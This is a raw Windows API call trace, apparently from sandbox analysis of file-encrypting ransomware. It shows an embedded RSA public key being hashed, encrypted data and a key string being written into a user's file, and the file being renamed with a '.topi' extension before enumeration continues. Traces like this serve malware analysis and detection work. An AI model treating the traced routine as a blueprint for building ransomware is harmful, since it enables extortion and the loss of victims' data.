[0097.693] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.694] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0097.694] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.694] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.695] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.695] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.695] GetLastError () returned 0x0 [0097.695] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.695] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0097.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.695] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.695] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.695] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2600) returned 0x99fc2d8 [0097.695] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb800 [0097.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb848 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.696] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f58 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f40 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.697] GetCurrentThreadId () returned 0x8c4 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9fe0 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.697] GetCurrentThreadId () returned 0x8c4 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f70 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb848 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.702] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x25f7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x25f7, lpOverlapped=0x0) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0097.702] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x25fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.702] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.703] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.703] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.703] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.703] CloseHandle (hObject=0x6a8) returned 1 [0097.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0097.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.704] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\xsJpoDLC50i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\xsjpodlc50i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\xsJpoDLC50i.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\xsjpodlc50i.wav.topi")) returned 1 [0097.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.705] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.706] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b4696e0, ftCreationTime.dwHighDateTime=0x1d5b9ed, ftLastAccessTime.dwLowDateTime=0xc7eb4e60, ftLastAccessTime.dwHighDateTime=0x1d5bd09, ftLastWriteTime.dwLowDateTime=0xc7eb4e60, ftLastWriteTime.dwHighDateTime=0x1d5bd09, nFileSizeHigh=0x0, nFileSizeLow=0x25fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xsJpoDLC50i.wav", cAlternateFileName="XSJPOD~1.WAV")) returned 0 [0097.706] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.706] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.707] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.707] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.707] RtlAllocateHeap 